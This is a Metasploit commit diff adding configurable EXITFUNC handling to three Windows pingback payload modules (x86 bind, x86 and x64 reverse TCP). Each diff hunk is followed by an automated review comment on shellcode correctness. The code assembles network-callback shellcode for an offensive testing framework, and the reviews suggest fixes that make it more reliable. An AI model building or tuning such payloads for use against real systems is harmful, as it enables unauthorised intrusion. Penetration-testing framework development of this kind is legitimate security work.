
Land #12159, EXITFUNC for pingback

wvu-r7 committed Aug 2, 2019
2 parents 6572fa9 + c9d2013 commit cbe4771d29375483fed4a46aea228936bcb4caad
@@ -7,6 +7,7 @@
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/windows/block_api'
require 'msf/base/sessions/pingback'
require 'msf/core/payload/windows/exitfunk'

module MetasploitModule

@@ -17,6 +18,7 @@ module MetasploitModule
include Msf::Payload::Pingback
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Pingback::Options
include Msf::Payload::Windows::Exitfunk

def initialize(info = {})
super(merge_info(info,
@@ -30,12 +32,23 @@ def initialize(info = {})
'Session' => Msf::Sessions::Pingback
))

def generate_stage
def required_space
# Start with our cached default generated size
space = cached_size

# EXITFUNK 'seh' is the worst case, that adds 15 bytes
space += 15

space
end

def generate
encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first
encoded_host = Rex::Socket.addr_aton(datastore['LHOST']||"127.127.127.127").unpack("V").first
encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
self.pingback_uuid ||= self.generate_pingback_uuid
uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
conf = { exitfunk: datastore['EXITFUNC'] }
addr_fam = 2
sockaddr_size = 16

@@ -134,12 +147,10 @@ def generate_stage
call ebp ; closesocket(socket)
failure:
exitfunk:
mov ebx, 0x56a2b5f0
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; ExitProcess(0)
^
if conf[:exitfunk]
asm << asm_exitfunk(conf)
end
Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end
end
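Review bot: The `exitfunk:` label is now emitted only when `conf[:exitfunk]` is truthy (`if conf[:exitfunk]` / `asm << asm_exitfunk(conf)`), yet the `failure:` path directly above it relied on falling through into that stub; with `EXITFUNC` unset the assembled blob now ends right after `failure:` and execution runs off the end of the shellcode, and any earlier `jmp exitfunk` in the unseen part of the body would fail to assemble. Unless a module included outside this hunk registers `EXITFUNC` with a default, I would make the fallback explicit, `conf = { exitfunk: datastore['EXITFUNC'] || 'process' }`, or raise rather than silently emit no exit stub. The new `required_space` comment `EXITFUNK 'seh' is the worst case, that adds 15 bytes` also deserves a check against the shared helper: in the other x86 Windows payloads I have seen, the `thread` variant (which does a GetVersion check) is the largest, and an underestimate here lets the space check admit a payload that no longer fits. `generate` starts at the second hunk but its asm body runs outside the visible lines.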
@@ -7,6 +7,8 @@
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/block_api'
require 'msf/base/sessions/pingback'
require 'msf/core/payload/windows/exitfunk'

module MetasploitModule

CachedSize = 292
@@ -16,6 +18,7 @@ module MetasploitModule
include Msf::Payload::Pingback
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Pingback::Options
include Msf::Payload::Windows::Exitfunk

def initialize(info = {})
super(merge_info(info,
@@ -29,14 +32,25 @@ def initialize(info = {})
'Session' => Msf::Sessions::Pingback
))

def generate_stage
def required_space
# Start with our cached default generated size
space = cached_size

# EXITFUNK 'seh' is the worst case, that adds 15 bytes
space += 15

space
end

def generate
encoded_port = [datastore['LPORT'].to_i, 2].pack("vn").unpack("N").first
encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || "127.127.127.127").unpack("V").first
retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max
pingback_count = datastore['PingbackRetries']
pingback_sleep = datastore['PingbackSleep']
self.pingback_uuid ||= self.generate_pingback_uuid
uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
conf = { exitfunk: datastore['EXITFUNC'] }

asm = %Q^
cld ; Clear the direction flag.
@@ -139,12 +153,10 @@ def generate_stage
; try again
jnz create_socket
jmp failure
exitfunk:
mov ebx, 0x56a2b5f0
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; ExitProcess(0)
^
if conf[:exitfunk]
asm << asm_exitfunk(conf)
end
Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end
end
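Review bot: `CachedSize = 292` (context above the first hunk) was computed when the tail was a fixed `ExitProcess(0)` call; now that `generate` appends a stub whose size depends on `EXITFUNC`, that constant should be regenerated for the default technique, and `required_space` must cover the largest variant the shared helper can emit — the `15 bytes` / `'seh'` figure in the comment reads as copied from another payload and I would confirm it against `asm_exitfunk` rather than trust it. The `jmp failure` left in this hunk targets a label outside the visible lines, and the removed `exitfunk:` label that followed it was the only exit path; when `datastore['EXITFUNC']` is nil nothing is appended, so the error path now falls off the end of the buffer unless the option is guaranteed a default elsewhere (`conf = { exitfunk: datastore['EXITFUNC'] || 'process' }` would make that explicit). The `generate` method begins in the second hunk and continues past the visible lines.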
@@ -6,6 +6,8 @@
require 'msf/core/payload/pingback'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/pingback'
require 'msf/core/payload/windows/x64/block_api'
require 'msf/core/payload/windows/x64/exitfunk'

module MetasploitModule

@@ -15,6 +17,8 @@ module MetasploitModule
include Msf::Payload::Single
include Msf::Payload::Pingback
include Msf::Payload::Pingback::Options
include Msf::Payload::Windows::BlockApi_x64
include Msf::Payload::Windows::Exitfunk_x64

def initialize(info = {})
super(merge_info(info,
@@ -27,7 +31,18 @@ def initialize(info = {})
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Pingback
))
def generate_stage

def required_space
# Start with our cached default generated size
space = cached_size

# EXITFUNK 'seh' is the worst case, that adds 15 bytes
space += 15

space
end

def generate
# 22 -> "0x00,0x16"
# 4444 -> "0x11,0x5c"
encoded_port = [datastore['LPORT'].to_i, 2].pack("vn").unpack("N").first
@@ -38,6 +53,8 @@ def generate_stage
pingback_sleep = datastore['PingbackSleep']
self.pingback_uuid ||= self.generate_pingback_uuid
uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
conf = { exitfunk: datastore['EXITFUNC'] }


asm = %Q^
cld ; Clear the direction flag.
@@ -241,14 +258,9 @@ def generate_stage
jmp create_socket ; repeat callback
^
end
asm << %Q^
exitfunk:
pop rax ; won't be returning, realign the stack with a pop
push 0 ;
pop rcx ; set the exit function parameter
mov r10, 0x56a2b5f0
call rbp ; ExitProcess(0)
^
if conf[:exitfunk]
asm << asm_exitfunk(conf)
end
Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
end
end
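Review bot: The removed tail deliberately executed `pop rax ; won't be returning, realign the stack with a pop` before calling `ExitProcess`, and the replacement `asm << asm_exitfunk(conf)` drops that realignment; on x64 a misaligned stack at a Win32 call is a crash risk, so unless `Exitfunk_x64`'s stub performs its own alignment (not visible here) the `pop rax` should be kept ahead of the appended stub, e.g. `asm << "pop rax ; realign before the exit stub\n"` guarded by the same `if conf[:exitfunk]`. As in the other two payloads, a nil `EXITFUNC` now produces no exit stub at all, so the code that previously fell into `exitfunk:` would run off the end of the shellcode; a default such as `datastore['EXITFUNC'] || 'process'` or an explicit raise would be safer than the silent skip. The `required_space` comment cites `'seh'` as the worst case at 15 bytes, which I would verify against the x64 helper's supported techniques. `generate` begins in the third hunk and its asm body continues outside the visible lines.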
